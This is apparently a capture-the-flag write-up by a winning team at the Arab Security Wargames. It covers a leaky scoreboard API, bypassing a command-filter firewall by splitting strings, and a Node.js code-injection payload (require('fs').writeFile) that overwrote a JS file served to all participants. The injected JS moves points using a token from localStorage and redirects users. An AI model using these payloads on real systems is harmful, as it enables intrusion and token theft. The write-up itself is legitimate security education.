• First of all: Who are we?!

We are a team consisting of independent Security Researchers,Bug Hunters and Developers working separately in various Tech Companies .. and we like to play CTFs from time to time, so this is a writeup about the last competition we enrolled to which we got First Place in [Team r3billions] !


M.Ghobashy - K.Amin - M.Monim - S.Aziz - Alaa

  • Brief about the competition

The Arab Security Wargames championship is a cyber security challenge that simulates a real Cyber Attack Scenario for the participants and demands that they possess High skills in all security fields like Networks, Web, Reverse Engineering and Digital forensics, and allows 4–5 participants in each team.

This competition is not like a regular CTF, it requires more interaction with other devices and participants… and it was made up of Four Phases where the last one is the Attack/Defense phase, where each team would be able to steal points from other teams using a security vulnerability they should uncover.

Lets Start! _Time: 1:30 pm _

Before the competition starts, based on our experience last year in the competition we decided that 4 of us would start giving a try at the challenges, and one would start monitoring the platform’s requests and try to find any vulnerability which we may use.

After 5 minutes, our team member was able to find a API GET request which basically returned data about all participants and id’s, and it also returned the Challenges’ Flags and Hints!!

Weird thing huh?! but it was expected due to the history of the competition.
We tried submitting some flags and they seemed to work, but we didn’t submit them all at once to not notify the other teams that we found something.

Teams and Users’ Wallets

Our focus now was on the vulnerability allowing us to steal other team’s points and we also wanted to have fun and try to solve the challenges.
Eventually, we were able to get some really interesting findings in both the roads! But first lets understand how the wallets work…

Every user has a wallet_id where he can store his points gained when he solve a challenge, and the whole team has another wallet_id where they should all send their points to be declared in the scoreboard and ranked accordingly.

Last year’s competition, there was a vulnerability that allowed to steal points from the teams’ wallets, but as we don’t know this year’s vulnerability yet and whether it’s going to attack the users wallets or the teams’, we decided to divide the points among ourselves in order to prevent other teams from stealing them all at once if they found a way.

2 Hours Later

Challenges

Meanwhile, we worked on other challenges and solved some of them, and we unlocked a challenge called Gate One Z which was worth 450 points, and after reading the challenge we understood that we should ask a Guardian one of the competition organizers to give us credentials to an application called Gate One Z which in turn gave us SSH access to a Raspberry Pi running on Linux where the SSH credentials was the same for everyone!

In a nutshell, all we had to do was reboot the system and write our team’s name inside the raspberry pi and defend it so that nobody else could access it and do the same. But the problem was that Gate One Z is a Firewall restricting some commands that we tried to do using the SSH access we were given.
We tried “ls”, and we got the error “Unauthorized”, we tried “reboot” and the same error kept coming.

Bypass

So this indeed needed to be bypassed! After some trials we created a python file and tried to execute the commands inside it, the python file’s content was like this:

import os  
os.system(“ls”)

The firewall worked and scanned the file to see if it contains any words typical to it’s dictionary and since “ls” is one of them it didn’t work.
We then tried to edit the file as following:

import os  
os.system(“l”+“s”)

but it didn’t work. However, we tried to run the commands with a single quote into a python shell directly and after executing this command:

> os.system(‘l’+’s’)

It worked!!!

We now bypassed the firewall and can execute unauthorized commands, we now need to write our name in the /etc/motd file and change the password of the SSH so that no one could access it.

When trying to edit the file we couldn’t overwrite it although we executed nano, but the overwrite process didn’t succeed. So we created a file with our name on the machine’s desktop and just changed the password.
We also discovered a flaw in the firewall that was not intended, but we can’t discuss it further before the fix is deployed.

3 Hours Later

The last Phase started with us being the 1st after we were instructed to submit all our points to the Team wallet.

Attack & Defense Phase

All teams were connected to the same network but each on a different vlan, even the platform in use was running locally in the same network.
So while working on another challenge called Glass Eye, which said that there was a machine -camera- running in the same room connected to our network which we need to access and look through it to get the flag.

But it was impossible to bruteforce the network’s IPs, and we were told that the machine was visible to all teams so after scanning the vlan which the platform was in, we found 6 up IPs one of them was suspicious, as when we monitored the platform there was 3 JS files, one of them was fetched using a request sent from that IP which was 10.0.0.25:4000!!
So it was our chance to dig deeper.

After reviewing all 3 JS files we couldn’t find anything interesting, but what about the request sent to 10.0.0.25:4000?!
The Request looked like this:

GET /js/script.js?latest=true

We tried to fuzz the latest parameter for code injection and Here we are!!
We were able to overwrite the JS file which loads in the platform on every other participant’s laptop!!
-> Theoretically, we should be able to inject some JS code which initiates a request that sends points to our teams’ wallet whenever it ran on another participant’s device.

At this point, It was 6:00 pm, which means we only had 30 minutes left!!!

These 30 minutes could determine who’s the champion if someone was able to exploit this before us and steal our points! we couldn’t hide our points in the users’ wallets because if another team had the same points like us and submitted them then we would be 2nd and they would be 1st as they would have been the first do so.

Defense Technique

In order to protect ourselves from being stolen until we write the malicious script, we turned off the JavaScript in our browsers so that if anybody got there before us they wouldn’t be able to exploit the vulnerability on our team.

And now … The Attack !!

We first tried to put this payload:

require(‘fs’).writeFile(“script.js”, “js goes here”, function(err){})

And we succeeded to create another file called script.js in the same directory as the other file but it was not overwritten! The primary file was still there... so after some fuzzing we discovered the problem which was that we didn’t specify the file’s full path and after writing this payload:

require(‘fs’).writeFile(“public/js/script.js”, “js goes here”, function(err){})

The original file was edited to whatever we wanted and we were able to run the code we wrote on all the participants’ devices!! Now to the next phase ..

Stealing Points

The Guardians gave all teams a hint, that we can’t just steal points from other teams’ we had to make them send it to our wallet_id, so we had to write the JS code to do so, so we wrote this payload:

require(‘fs’).writeFile(“public/js/script.js”, “ var xhttp = new XMLHttpRequest(); xhttp.open(“POST”, “/send/our_wallet_id”, true); xhttp.send(‘{\”points\”:\”200\”}’);”, function(err){})

But unfortunately it didn’t work! We discovered that there was a authorization header -Ticket- that should be sent along with the request to do so, which we should have edited the payload to look like this:

require(‘fs’).writeFile(“public/js/script.js”, “ var xhttp = new XMLHttpRequest(); xhttp.open(“POST”, “/send/our_wallet_id”, true); xhttp.send(‘{\”points\”:\”200\”}’); xhttp.setRequestHeader(“Ticket”, localStorage.getitem(“token”));”, function(err){})

But since then we only had 5 minutes left, we couldn’t manage to write it in time. But instead we thought of an easy way to disturb other participants from accessing the platform and discovering the vulnerability by simply logging them out of their accounts as soon as the JS code executed using this payload:

require(‘fs’).writeFile(“public/js/location.href=//10.0.0.35:3000/login#”, function(err){})

Then we finished our work and added our final touch by simply writing an Alert popup with our team’s name (r3billions rules) to be shown to all the participants’ and acknowledge how far we have come!

Finally!!

The time ran out, and we were still on top of the scoreboard as the competition ended with our name on all the participants’ screens and no one else even discovering the vulnerability but us!

Next day, we received the tournament cup at the ceremony and the grand prize which was 75,000 L.E!!

Takeaways

1- Teamwork always leads to results.
2- There is always an alternative way to achieve your goal.
3- The art of exploitation is as important as the ability to discover vulnerabilities.
4- Knowing your team’s members strengths and taking advantage of them is a must.

Thank you for Reading.